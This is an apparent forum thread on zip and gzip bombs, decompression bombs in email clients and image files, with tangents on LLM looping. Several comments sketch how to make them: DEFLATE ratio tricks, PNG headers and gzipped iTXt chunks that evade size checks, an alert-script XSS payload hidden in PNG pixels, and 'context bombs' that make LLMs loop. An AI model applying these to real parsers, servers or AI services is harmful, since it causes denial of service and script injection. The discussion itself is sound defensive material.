If you are processing emails for security reasons, and want to find viruses even if they are in archive files, it's easy to write the code to "just keep unarchiving until we're out of things to unarchive", but not only can that lead to quite astonishing expansions, it can actually be a process that never terminates at all.
I remember when I first read about these, and "a small file that decompresses to a gigabyte" was also "a small file that decompresses to several multiples of your entire hard disk space" and even servers couldn't handle it. Now I read articles like this one talking about "oh yeah Evolution filled up 100GB of space" like that's no big deal.
If you have a recursive decompressor you can still make small files that uncompress to large amounts even by 2025 standards, because the symbols the compressor will use to represent "as many zeros as I can have" will themselves be redundant. The rule that you can't compress already-compressed content doesn't necessarily apply to these sorts of files.
A few years ago David Fitfield invented a technique which provides a million-to-one non-recursive expansion, by overlapping the file streams: https://www.bamsoftware.com/hacks/zipbomb/
I thought someone posted a blog post from someone who does in the last couple of months? Any time they got hits on their site from misbehaving bots I think they returned a gzip bomb in the HTTP response.
It's all just spray-and-pray crap. You're extremely unlikely to be their target, they're just looking for a convenient shell for a botnet. The most likely way they'll handle it if you do actually break them is just blacklist your address. You're not going to be worth the effort.
I've been sending a nice 10GB gzip bomb (12MB after compression, rate limited download speed) to people that send various malicious requests. I think I might update it tonight with this other approach.
> Now I read articles like this one talking about "oh yeah Evolution filled up 100GB of space" like that's no big deal.
Is this actually a practical issue though? Windows, Mac and Linux all support transparent compression at the filesystem level, so 100GB of /dev/zero isnt actually going to fill much space at all.
I'd be curious if there's an LLM prompt equivalent of a zip bomb that will explode the context window. I know there's deterministic limits on context window, but future LLMs _are_ going to have strange loops and going to be very susceptible to circular reasoning.
Before AGI, there will be a untenable gullible general intelligence.
I've seen LLMs get into loops because they forgot what they were trying to do. For instance, I asked an LLM to write some code to search for certain types of wordplay, and it started making a word list (rather than writing code to pull in a standard dictionary), and then it got distracted and just kept listing words until it ran out of time.
One of the things that will likely _characterize_ AGI are nondeterministic loops.
My bet is that if AGI is possible it will take a form that looks something like
x_(n+1) = A * x_n (1 - x_n)
Where x is a billions long vector and the parameters in A (sizeof(x)^2 ?) are trained and also tuned to have period 3 or nearly period three for a meta-stable near chaotic progression of x.
Whats confusing to me is the dual use of the word entropy in both the physical science and in communication. The local minimums are some how stable in a world of increasing entropy. How do these local minimums ever form when there's such a large arrow of entropy.
Certainly intelligence is a reduction of entropy, but it's also certainly not stable. Just like cellular automata (https://record.umich.edu/articles/simple-rules-can-produce-c...), loops that are stable can't evolve, but loops that are unstable have too much entropy.
So, we're likely searching for a system thats meta stable within a small range of input entropy (physical) and output entropy (information).
If you have any system that tries to gravitate to a local minimum it is almost impossible to not make Newton's fractal with it. Classical feed forward network learning does pretty much look like newtons method to me. Please take a look into https://en.m.wikipedia.org/wiki/Newton%27s_method
I ran into one of these in the very early 00s; was working at a university (back in the days when a couple of people would run all the central servers, running Linux on beige PCs.) We had some anti-spam/AV software that looked at every incoming email hooked into Postfix, and the server kept running out of disk space.
Eventually tracked it down to an email which contained a zip of stock trading data – just the three letter stock code and the shift. It wasn't malicious, it just had an extraordinarily high compression ratio!
That Evolution mail caching behaviour is really sketchy. I wonder if it could be used for an exploit in the right scenario. If nothing else, it’s a good way to make an email that looks completely different depending on which client it’s opened in.
I don't think this was done on purpose. If the query string is "?a=b" that's fine, and it's used in the cache filename. But if the query string is "?a" then it's excluded from the cache filename.
Either way, the correct full URL is fetched with the full query string. It's just how it's cached that is affected.
Not what you were asking for but my favorite valid image is exploit code as PNG image data. It's just pixels in specific colors that, after compression, have the bytes in the file spell out something like <script>alert(1)</script>
I consulted for a bank once where the server stripped metadata and re-encoded images from scratch again and the devs thought that would remove any maliciousness. It's just pixels right? I might have thought so as well, but I had this idea and wanted to double check, and it didn't take long to find someone smarter than me had already done the work: https://web.archive.org/web/20250713054441/http://www.idontp... (By now I see there are a dozen commercial parties that rank higher for this topic. Marginalia search helped me re-find the OG post just now)
Edit, thought I should add: the solution is to specify the correct content type. Don't let your PHP interpreter interpret files in the user uploads directory. Don't serve images with content-type text/html because the browser will interpret it as HTML (as instructed) and run any code inside on your domain ('origin'). Mark data as separate from code whenever possible, or escape it when that's impossible
The reason it doesn't work with JPEG is JPEG isn't a description of individual pixels but rather how you'd calculate what the individual pixel should be. That's part of the reason you can progressively load jpeg data.
PNG is actually a description of the RGB value for the individual pixels. That's why I believe you could png bomb, you could have a 2 billion by 2 billion black pixel image which would ultimately eat up a bunch of space in your GPU and memory to decode.
Perhaps something similar is possible with a JPEG, but it's really nothing to do with the compression info. JPEGs have a max size of 65,535×65,535, which would keep you from exploding them.
DEFLATE can only obtain a best-case compression ratio approaching 1032:1. (Put the byte to repeat in a preceding block, and set "0" = 256 and "1" = 285 for the literal/length code and "0" = 0 for the distance code. Then "10" will output 258 bytes.) This means a 2 Gpx × 2 Gpx PNG image will still be at least ~3.875 PB.
If you send it compressed over the wire, you could get another factor of 1032, or perhaps more depending on which algorithms the client supports. Also, you could generate it on demand as a data stream. Bit these run the risk of the client stopping the transfer before ever trying to process the image.
There are some stupid tricks you can pull with image formats like emitting the headers for a gigantic image without including enough image data to actually encode the whole image. Most decoders will try to allocate a buffer up front (possibly as much as 16 GB for a 65535x65535 image!) before discovering that the image is truncated.
The same trick works with PNG, actually. Possibly even better: it uses a pair of 32-bit integers for the resolution.
Is there a reason the malicious part of the payload has to be pixels? You could have a 100x100px image with 000s of 2GB iTXt chunks, no? That would bypass naive header checks that only reject based on canvas size.
However, it may work with the article's process - a 100x100 png with lots of 2GB-of-nothing iTXt chunks could be gzipped and served with `Content-Encoding: gzip` - so it would pass the "is a valid png" and "not pixel-huge image" checks but still require decompression in order to view it.
Hmm that reminds me, it idly crossed my mind recently about whether AIs with online RAG have decent zip-bomb protection. This thought was provoked when I realised Perplexity would find and download and (apparently) analyse spreadsheet content. I'm sure there are zip-bomb equivalents in binary formats like .xlsx, PDF, .docx, etc.
In addition to zip bombing AIs with file parsers, I've wondered about 'context bombs' in the sense of trigger phrases that trip up LLMs into getting stuck into repeating phrases or reasoning evaluations without ever hitting an end of sequence (EOS) token, thus running a system up against API call limits / burning credits / effectively ddosing services etc.
Due to the inherent fuzziness/diversity in all models right now I don't think there is a universal approach to this idea but it is something people deploying these systems may want to try and detect.
> I'm sure there are zip-bomb equivalents in binary formats like .xlsx, PDF, .docx, etc.
Yes. Both, docx and xlsx are literally just a zip of XML files with a different extension. PDF can contain zlib streams, which use deflate compression just as gzip, so all the mentioned methods apply to all three formats.
Another fun one is the .zip or .tar.gz file that decompresses to itself: https://research.swtch.com/zip
If you are processing emails for security reasons, and want to find viruses even if they are in archive files, it's easy to write the code to "just keep unarchiving until we're out of things to unarchive", but not only can that lead to quite astonishing expansions, it can actually be a process that never terminates at all.
I remember when I first read about these, and "a small file that decompresses to a gigabyte" was also "a small file that decompresses to several multiples of your entire hard disk space" and even servers couldn't handle it. Now I read articles like this one talking about "oh yeah Evolution filled up 100GB of space" like that's no big deal.
If you have a recursive decompressor you can still make small files that uncompress to large amounts even by 2025 standards, because the symbols the compressor will use to represent "as many zeros as I can have" will themselves be redundant. The rule that you can't compress already-compressed content doesn't necessarily apply to these sorts of files.
A few years ago David Fitfield invented a technique which provides a million-to-one non-recursive expansion, by overlapping the file streams: https://www.bamsoftware.com/hacks/zipbomb/
Might be fun to respond with one of these to malicious requests for /.env, /.git/config and /.aws/credentials instead of politely returning 404s.
I thought someone posted a blog post from someone who does in the last couple of months? Any time they got hits on their site from misbehaving bots I think they returned a gzip bomb in the HTTP response.
I remember that also.
edit - this? https://idiallo.com/blog/zipbomb-protection
Yes that's the one.
It’s definitely tempting, but I prefer not to piss off people who are already being actively malicious.
It's all just spray-and-pray crap. You're extremely unlikely to be their target, they're just looking for a convenient shell for a botnet. The most likely way they'll handle it if you do actually break them is just blacklist your address. You're not going to be worth the effort.
Isn’t this how a court system works?
I've been sending a nice 10GB gzip bomb (12MB after compression, rate limited download speed) to people that send various malicious requests. I think I might update it tonight with this other approach.
Can't you just server /dev/urandom?
And eat up your bandwidth?
> Now I read articles like this one talking about "oh yeah Evolution filled up 100GB of space" like that's no big deal.
Is this actually a practical issue though? Windows, Mac and Linux all support transparent compression at the filesystem level, so 100GB of /dev/zero isnt actually going to fill much space at all.
That's not switched on by default unless you use a filesytsem like ZFS.
I'd be curious if there's an LLM prompt equivalent of a zip bomb that will explode the context window. I know there's deterministic limits on context window, but future LLMs _are_ going to have strange loops and going to be very susceptible to circular reasoning.
Before AGI, there will be a untenable gullible general intelligence.
I've seen LLMs get into loops because they forgot what they were trying to do. For instance, I asked an LLM to write some code to search for certain types of wordplay, and it started making a word list (rather than writing code to pull in a standard dictionary), and then it got distracted and just kept listing words until it ran out of time.
One of the things that will likely _characterize_ AGI are nondeterministic loops.
My bet is that if AGI is possible it will take a form that looks something like
Where x is a billions long vector and the parameters in A (sizeof(x)^2 ?) are trained and also tuned to have period 3 or nearly period three for a meta-stable near chaotic progression of x."Period three implies chaos" https://www.its.caltech.edu/~matilde/LiYorke.pdf
That is if AGI is possible at all without wetware.
Chaos isn't intelligence. Chaos is unmanageable growth in your solution space, the oppisite of what you want.
Whats confusing to me is the dual use of the word entropy in both the physical science and in communication. The local minimums are some how stable in a world of increasing entropy. How do these local minimums ever form when there's such a large arrow of entropy.
Certainly intelligence is a reduction of entropy, but it's also certainly not stable. Just like cellular automata (https://record.umich.edu/articles/simple-rules-can-produce-c...), loops that are stable can't evolve, but loops that are unstable have too much entropy.
So, we're likely searching for a system thats meta stable within a small range of input entropy (physical) and output entropy (information).
There are theories and evidence that your brain operates hovering on the edge of the phase transition to chaos
https://en.m.wikipedia.org/wiki/Critical_brain_hypothesis
If you have any system that tries to gravitate to a local minimum it is almost impossible to not make Newton's fractal with it. Classical feed forward network learning does pretty much look like newtons method to me. Please take a look into https://en.m.wikipedia.org/wiki/Newton%27s_method
I ran into one of these in the very early 00s; was working at a university (back in the days when a couple of people would run all the central servers, running Linux on beige PCs.) We had some anti-spam/AV software that looked at every incoming email hooked into Postfix, and the server kept running out of disk space.
Eventually tracked it down to an email which contained a zip of stock trading data – just the three letter stock code and the shift. It wasn't malicious, it just had an extraordinarily high compression ratio!
That Evolution mail caching behaviour is really sketchy. I wonder if it could be used for an exploit in the right scenario. If nothing else, it’s a good way to make an email that looks completely different depending on which client it’s opened in.
> it’s a good way to make an email that looks completely different depending on which client it’s opened in.
Well, for that use the differences in HTML&CSS support and filtering ...
I guess the reason they added this was that they noticed many mails contain same tracking images and decided to cut of tracking data that way.
I don't think this was done on purpose. If the query string is "?a=b" that's fine, and it's used in the cache filename. But if the query string is "?a" then it's excluded from the cache filename.
Either way, the correct full URL is fetched with the full query string. It's just how it's cached that is affected.
So can you construct valid image that would also act as zip bomb?
Jpeg and other lossy compression images should allow some of that, but dependens on compatibility of compression between gzip and image format.
There is that example where you have "zero image" of big dimensions, but can you actually conflate gzip and image compression?
Not what you were asking for but my favorite valid image is exploit code as PNG image data. It's just pixels in specific colors that, after compression, have the bytes in the file spell out something like <script>alert(1)</script>
I consulted for a bank once where the server stripped metadata and re-encoded images from scratch again and the devs thought that would remove any maliciousness. It's just pixels right? I might have thought so as well, but I had this idea and wanted to double check, and it didn't take long to find someone smarter than me had already done the work: https://web.archive.org/web/20250713054441/http://www.idontp... (By now I see there are a dozen commercial parties that rank higher for this topic. Marginalia search helped me re-find the OG post just now)
Edit, thought I should add: the solution is to specify the correct content type. Don't let your PHP interpreter interpret files in the user uploads directory. Don't serve images with content-type text/html because the browser will interpret it as HTML (as instructed) and run any code inside on your domain ('origin'). Mark data as separate from code whenever possible, or escape it when that's impossible
I don't think you can do it with Jpeg, but you could probably do it with PNG which is basically using the same compression algorithm as zip.
Deflate allows a maximum compression ratio of 1000:1 or thereabouts.
Considering I’ve seen real world JPEGs above 300:1 (https://eoimages.gsfc.nasa.gov/images/imagerecords/73000/739...) I would not be surprised if you could craft a jpeg getting very close to or exceeding 4 digits.
The reason it doesn't work with JPEG is JPEG isn't a description of individual pixels but rather how you'd calculate what the individual pixel should be. That's part of the reason you can progressively load jpeg data.
PNG is actually a description of the RGB value for the individual pixels. That's why I believe you could png bomb, you could have a 2 billion by 2 billion black pixel image which would ultimately eat up a bunch of space in your GPU and memory to decode.
Perhaps something similar is possible with a JPEG, but it's really nothing to do with the compression info. JPEGs have a max size of 65,535×65,535, which would keep you from exploding them.
DEFLATE can only obtain a best-case compression ratio approaching 1032:1. (Put the byte to repeat in a preceding block, and set "0" = 256 and "1" = 285 for the literal/length code and "0" = 0 for the distance code. Then "10" will output 258 bytes.) This means a 2 Gpx × 2 Gpx PNG image will still be at least ~3.875 PB.
If you send it compressed over the wire, you could get another factor of 1032, or perhaps more depending on which algorithms the client supports. Also, you could generate it on demand as a data stream. Bit these run the risk of the client stopping the transfer before ever trying to process the image.
There are some stupid tricks you can pull with image formats like emitting the headers for a gigantic image without including enough image data to actually encode the whole image. Most decoders will try to allocate a buffer up front (possibly as much as 16 GB for a 65535x65535 image!) before discovering that the image is truncated.
The same trick works with PNG, actually. Possibly even better: it uses a pair of 32-bit integers for the resolution.
You can with PNG, but you have to set a high pixel resolution and most viewers have hard limits before it gets too crazy.
Is there a reason the malicious part of the payload has to be pixels? You could have a 100x100px image with 000s of 2GB iTXt chunks, no? That would bypass naive header checks that only reject based on canvas size.
You'd probably do zTxt chunks right? But regardless I'd guess that there's nothing that would cause a renderer to actually read that chunk.
The iTXt chunk can also be compressed <https://www.w3.org/TR/png/#10CompressionOtherUses>.
Ah yes, that makes sense.
However, it may work with the article's process - a 100x100 png with lots of 2GB-of-nothing iTXt chunks could be gzipped and served with `Content-Encoding: gzip` - so it would pass the "is a valid png" and "not pixel-huge image" checks but still require decompression in order to view it.
Hmm that reminds me, it idly crossed my mind recently about whether AIs with online RAG have decent zip-bomb protection. This thought was provoked when I realised Perplexity would find and download and (apparently) analyse spreadsheet content. I'm sure there are zip-bomb equivalents in binary formats like .xlsx, PDF, .docx, etc.
In addition to zip bombing AIs with file parsers, I've wondered about 'context bombs' in the sense of trigger phrases that trip up LLMs into getting stuck into repeating phrases or reasoning evaluations without ever hitting an end of sequence (EOS) token, thus running a system up against API call limits / burning credits / effectively ddosing services etc.
Due to the inherent fuzziness/diversity in all models right now I don't think there is a universal approach to this idea but it is something people deploying these systems may want to try and detect.
> I'm sure there are zip-bomb equivalents in binary formats like .xlsx, PDF, .docx, etc.
Yes. Both, docx and xlsx are literally just a zip of XML files with a different extension. PDF can contain zlib streams, which use deflate compression just as gzip, so all the mentioned methods apply to all three formats.
Isn't that trivial to prevent zip bombs?
Most things are trivial to prevent if you know of and think to check for them.
How does it work with Claws Mail/Sylpheed?
Yet another reason to prevent emails from downloading stuff from remote servers...
It appears that you can't do these sorts of things with with CID embedded images...